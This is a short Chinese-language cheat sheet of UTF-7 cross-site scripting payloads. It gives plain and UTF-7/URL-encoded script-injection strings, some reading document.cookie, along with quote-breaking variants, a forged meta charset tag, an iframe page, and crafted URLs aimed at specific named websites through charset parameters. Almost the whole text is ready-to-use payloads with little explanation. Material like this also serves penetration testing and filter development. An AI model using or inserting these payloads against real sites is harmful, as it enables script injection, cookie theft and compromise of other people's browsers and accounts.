UTF-7 XSS 常见利用方法

1、基本样式

<script>alert(31337)</script>

+ADw-script+AD4-alert(31337)+ADw-/script+AD4-

<script>alert(document.cookie)</script>

+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-

+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-

<script>alert(document.location)</script>

2、URL encoded 转换后的样式

%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-

<script>alert(document.location)</script>

3、利用引号’和”

+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-

"><script>alert(document.location)</script><"

4、URL编码,利用引号’和”

%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-

"><script>alert(document.location)</script><"

5、注入伪造的<meta>标签

+ADw-/title+AD4APA-meta http-equiv+AD0-'content-type' content+AD0-'text/html+ADs-charset+AD0-utf-7'+AD4-

</title><meta http-equiv='content-type' content='text/html;charset=utf-7'>

6、利用UTF-7 iframe

<html>

<head>

<meta http-equiv="content-type" content="text/html;charset=utf-7">

</head>

<body>

<iframe src="http://www.hack1990.com /NOTFOUND/%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-"></iframe>

</body>

</html>

7、charset通过参数设定的

http://www.iick.blog/?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&oe=Windows-31J

http://www.iick.blog/?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&oe=CP932

http://www.iick.blog/?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&eo=MS932

http://www.iick.blog/?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&cs=jis

http://www.iick.blog/?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&charset=utf8

http://www.iick.blog/?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&enc=sjis